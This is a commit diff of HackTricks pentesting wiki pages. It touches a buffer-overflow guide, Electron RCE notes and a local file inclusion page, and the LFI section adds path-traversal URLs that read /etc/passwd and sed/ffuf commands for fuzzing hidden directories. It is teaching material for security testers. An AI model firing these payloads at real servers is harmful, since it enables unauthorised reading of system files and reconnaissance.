GitBook: [#3669] No subject
BIN
.gitbook/assets/image (34) (1).png
Normal file
After Width: | Height: | Size: 2.7 KiB |
Before Width: | Height: | Size: 2.7 KiB After Width: | Height: | Size: 230 KiB |
BIN
.gitbook/assets/image (35) (1).png
Normal file
After Width: | Height: | Size: 71 KiB |
Before Width: | Height: | Size: 71 KiB After Width: | Height: | Size: 719 KiB |
BIN
.gitbook/assets/image (36) (1).png
Normal file
After Width: | Height: | Size: 31 KiB |
Before Width: | Height: | Size: 31 KiB After Width: | Height: | Size: 238 KiB |
Before Width: | Height: | Size: 238 KiB After Width: | Height: | Size: 127 KiB |
|
@ -164,7 +164,7 @@ In this case you can see that **you shouldn't use the char 0x0A** (nothing is sa
|
|||
|
||||
In this case you can see that **the char 0x0D is avoided**:
|
||||
|
||||
![](<../.gitbook/assets/image (34).png>)
|
||||
![](<../.gitbook/assets/image (34) (1).png>)
|
||||
|
||||
## Find a JMP ESP as a return address
|
||||
|
||||
|
@ -182,7 +182,7 @@ You will **list the memory maps**. Search for some DLl that has:
|
|||
* **NXCompat: False**
|
||||
* **OS Dll: True**
|
||||
|
||||
![](<../.gitbook/assets/image (35).png>)
|
||||
![](<../.gitbook/assets/image (35) (1).png>)
|
||||
|
||||
Now, inside this memory you should find some JMP ESP bytes, to do that execute:
|
||||
|
||||
|
@ -193,7 +193,7 @@ Now, inside this memory you should find some JMP ESP bytes, to do that execute:
|
|||
|
||||
**Then, if some address is found, choose one that don't contain any badchar:**
|
||||
|
||||
![](<../.gitbook/assets/image (36).png>)
|
||||
![](<../.gitbook/assets/image (36) (1).png>)
|
||||
|
||||
**In this case, for example: \_0x5f4a358f**\_
|
||||
|
||||
|
|
|
@ -57,6 +57,10 @@ The desktop application might have access to the user’s device through Node AP
|
|||
* **`contextIsolation`** - is `on` by default. If on, main and renderer processes aren't isolated.
|
||||
* **`preload`** - empty by default.
|
||||
* [**`sandbox`**](https://docs.w3cub.com/electron/api/sandbox-option) - is off by default. It will restrict the actions NodeJS can perform.
|
||||
* Node Integration in Workers
|
||||
* **`nodeIntegrationInSubframes`**- is `off` by default.
|
||||
* If **`nodeIntregation`** is **enabled**, this would allow the use of **Node.js APIs** in web pages that are **loaded in iframes** within an Electron application.
|
||||
* If **`nodeIntregation`** is **disabled**, then preloads will load in the iframe
|
||||
|
||||
Example of configuration:
|
||||
|
||||
|
@ -75,7 +79,9 @@ const mainWindowOptions = {
|
|||
webPreferences: {
|
||||
blinkFeatures: 'EnumerateDevices,AudioOutputDevices',
|
||||
nodeIntegration: false,
|
||||
contextIsolation: false
|
||||
contextIsolation: false,
|
||||
sandbox: false,
|
||||
nodeIntegrationInSubFrames: false,
|
||||
preload: _path2.default.join(__dirname, 'mainScreenPreload.js'),
|
||||
nativeWindowOpen: true,
|
||||
enableRemoteModule: false,
|
||||
|
@ -118,6 +124,8 @@ If the **nodeIntegration** is set to **on**, a web page's JavaScript can use Nod
|
|||
</script>
|
||||
```
|
||||
|
||||
<figure><img src="../../../.gitbook/assets/image.png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
## RCE: preload
|
||||
|
||||
The script indicated in this setting is l**oaded before other scripts in the renderer**, so it has **unlimited access to Node APIs**:
|
||||
|
@ -263,7 +271,7 @@ webContents.on("new-window", function (event, url, disposition, options) {} // o
|
|||
webContents.on("will-navigate", function (event, url) {} // opens the custom openInternally function (it is declared below)
|
||||
```
|
||||
|
||||
The call to \*\* `openInternally`\*\* will decide if the **link** will be **opened** in the **desktop window** as it's a link belonging to the platform, **or** if will be opened in the **browser as a 3rd party resource**.
|
||||
The call to **`openInternally`** will decide if the **link** will be **opened** in the **desktop window** as it's a link belonging to the platform, **or** if will be opened in the **browser as a 3rd party resource**.
|
||||
|
||||
In the case the **regex** used by the function is **vulnerable to bypasses** (for example by **not escaping the dots of subdomains**) an attacker could abuse the XSS to **open a new window which** will be located in the attackers infrastructure **asking for credentials** to the user:
|
||||
|
||||
|
@ -317,6 +325,7 @@ npm start
|
|||
* [https://www.youtube.com/watch?v=a-YnG3Mx-Tg](https://www.youtube.com/watch?v=a-YnG3Mx-Tg)
|
||||
* [https://www.youtube.com/watch?v=xILfQGkLXQo\&t=22s](https://www.youtube.com/watch?v=xILfQGkLXQo\&t=22s)
|
||||
* More researches and write-ups about Electron security in [https://github.com/doyensec/awesome-electronjs-hacking](https://github.com/doyensec/awesome-electronjs-hacking)
|
||||
* [https://www.youtube.com/watch?v=Tzo8ucHA5xw\&list=PLH15HpR5qRsVKcKwvIl-AzGfRqKyx--zq\&index=81](https://www.youtube.com/watch?v=Tzo8ucHA5xw\&list=PLH15HpR5qRsVKcKwvIl-AzGfRqKyx--zq\&index=81)
|
||||
|
||||
<details>
|
||||
|
||||
|
|
|
@ -4,15 +4,11 @@
|
|||
|
||||
<summary><strong>Support HackTricks and get benefits!</strong></summary>
|
||||
|
||||
- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
|
||||
- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
|
||||
- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
|
||||
- **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
||||
|
||||
- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
|
||||
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
|
||||
|
||||
</details>
|
||||
|
||||
|
@ -62,18 +58,26 @@ location.reload();//Trigger the "exit" event
|
|||
</script>
|
||||
```
|
||||
|
||||
## Example 2
|
||||
|
||||
Get **require object from prototype pollution**. From [https://www.youtube.com/watch?v=Tzo8ucHA5xw\&list=PLH15HpR5qRsVKcKwvIl-AzGfRqKyx--zq\&index=81](https://www.youtube.com/watch?v=Tzo8ucHA5xw\&list=PLH15HpR5qRsVKcKwvIl-AzGfRqKyx--zq\&index=81)
|
||||
|
||||
Leak:
|
||||
|
||||
<figure><img src="../../../.gitbook/assets/image (34).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
Exploit:
|
||||
|
||||
<figure><img src="../../../.gitbook/assets/image (35).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Support HackTricks and get benefits!</strong></summary>
|
||||
|
||||
- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
|
||||
- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
|
||||
- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
|
||||
- **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
||||
|
||||
- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
|
||||
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
|
||||
|
||||
</details>
|
||||
|
|
|
@ -12,7 +12,7 @@
|
|||
|
||||
</details>
|
||||
|
||||
<figure><img src="../../.gitbook/assets/image.png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="../../.gitbook/assets/image (36).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
Did you know that crypto projects pay more bounty rewards than their web2 counterparts?\
|
||||
This [**crypto bounty alone**](https://hackenproof.com/jungle/jungle-smart-contract) is worth $1.000.000!\
|
||||
|
@ -112,31 +112,38 @@ http://example.com/index.php?page=utils/scripts/../../../../../etc/passwd
|
|||
### Identifying folders on a server
|
||||
|
||||
Depending on the applicative code / allowed characters, it might be possible to recursively explore the file system by discovering folders and not just files. In order to do so:
|
||||
- identify the "depth" of you current directory by succesfully retrieving `/etc/passwd` (if on Linux):
|
||||
|
||||
* identify the "depth" of you current directory by succesfully retrieving `/etc/passwd` (if on Linux):
|
||||
|
||||
```
|
||||
http://example.com/index.php?page=../../../etc/passwd # depth of 3
|
||||
````
|
||||
- try and guess the name of a folder in the current directory by adding the folder name (here, `private`), and then going back to `/etc/passwd`:
|
||||
```
|
||||
|
||||
* try and guess the name of a folder in the current directory by adding the folder name (here, `private`), and then going back to `/etc/passwd`:
|
||||
|
||||
```
|
||||
http://example.com/index.php?page=private/../../../../etc/passwd # we went deeper down one level, so we have to go 3+1=4 levels up to go back to /etc/passwd
|
||||
```
|
||||
- if the application is vulnerable, there might be two different outcomes to the request:
|
||||
- if you get an error / no output, the `private` folder does not exist at this location
|
||||
- if you get the content from `/etc/passwd`, you validated that there is indeed a `private`folder in your current directory
|
||||
|
||||
- the folder(s) you discovered using this techniques can then be fuzzed for files (using a classic LFI method) or for subdirectories using the same technique recursively.
|
||||
* if the application is vulnerable, there might be two different outcomes to the request:
|
||||
* if you get an error / no output, the `private` folder does not exist at this location
|
||||
* if you get the content from `/etc/passwd`, you validated that there is indeed a `private`folder in your current directory
|
||||
* the folder(s) you discovered using this techniques can then be fuzzed for files (using a classic LFI method) or for subdirectories using the same technique recursively.
|
||||
|
||||
It is possible to adapt this technique to find directories at any location in the file system. For instance, if, under the same hypothesis (current directory at depth 3 of the file system) you want to check if `/var/www/` contains a `private` directory, use the following payload:
|
||||
|
||||
```
|
||||
http://example.com/index.php?page=../../../var/www/private/../../../etc/passwd
|
||||
```
|
||||
|
||||
The following sequence of commands allows the generation of payloads using `sed` (1) as input for url fuzzing tools such as `ffuf` (2):
|
||||
|
||||
```
|
||||
$ sed 's_^_../../../var/www/_g' /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt | sed 's_$_/../../../etc/passwd_g' > payloads.txt
|
||||
$ ffuf -u http://example.com/index.php?page=FUZZ -w payloads.txt -mr "root"
|
||||
```
|
||||
Of course, adapt there payloads to your needs in terms of depth / location / input directory list.
|
||||
|
||||
Of course, adapt there payloads to your needs in terms of depth / location / input directory list.
|
||||
|
||||
### **Path truncation**
|
||||
|
||||
|
|